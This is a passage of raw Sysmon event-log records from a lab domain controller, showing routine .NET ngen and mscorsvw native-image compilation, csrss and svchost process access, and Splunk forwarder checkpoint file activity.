Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E9EA65DC4DCD1A415EEB67E57256A7,SHA256=C821A1814E46686C80CBCF0BA6B514A98FE98AEB4539E7752C80422B5F0BD30E,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000019018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:22.951{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bbc-0\System.ServiceModel.Channels.dll2021-06-23 21:01:22.951 10341000x800000000000000019017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.607{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.592{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:22.592{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.467{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.342{4DB9351A-A120-60D3-9102-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHHCQ7B43U\System.ServiceModel.Activities.ni.dll.auxMD5=DDB7231C3CE9AA4F6403B03F18570455,SHA256=BF05B11C53EC462BA62BC4466C6DF20FA8230702A3B6FB012AB3BE2BD68B43BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.342{4DB9351A-A120-60D3-9102-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHHCQ7B43U\System.ServiceModel.Activities.ni.dllMD5=4B411016CB3BBCD0A89F1D6D7A568E9B,SHA256=E5E2C8D503534AFF936493D2EDA30D0602BD4FCA8D0526C31B029E6405DFB5A6,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:22.279{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1658-0\System.ServiceModel.Activities.dll2021-06-23 21:01:22.279 23542300x800000000000000019008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.029{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3822E1236529F4B7451C9513E2B8833,SHA256=9F85CD1A67086299B254C8BA03E247E79657A4C32BD06B72BD053D74D9F4FE78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.888{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.888{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.810{4DB9351A-A123-60D3-9502-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NORY0L6TLS\System.ServiceModel.Discovery.ni.dll.auxMD5=9464ED6AA1A915927FA940EDB6ED8748,SHA256=660A0947C8208EF55CC5B4CF6CFB7F01915903A481AF426A4C3DFA87C26771BE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.810{4DB9351A-A123-60D3-9502-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NORY0L6TLS\System.ServiceModel.Discovery.ni.dllMD5=ACDEF191C255DA8ED7C0B5D99D5A644B,SHA256=8F2B92894F272F7841A7AC452BC42702C594B6A135B8DDD3DD81E1CEA52C506B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:23.763{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9b8-0\System.ServiceModel.Discovery.dll2021-06-23 21:01:23.763 23542300x800000000000000019026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.513{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7E858A2828DB53AB0F8D43D99B292E1,SHA256=2B8A3812DF73EA27BC3DA30082BE3680A44E2AC0E1FD7BDF82E93A56467E9671,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.185{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.170{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E264715E59A65040000A66D38127D06,SHA256=3E7DD6AAFE7F33B80FC4D7CB4A35A8A88317D5C6C15E43EA69C44F4F33D6FB21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:23.013{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.888{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBFBEF63DDF9C8401ACC2D1947EB06C6,SHA256=06C1BE728E12D137FF7C78D88099784DEDA484623649153224AC4950A76D1CF4,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000019043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.607{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:24.607{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.513{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.498{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 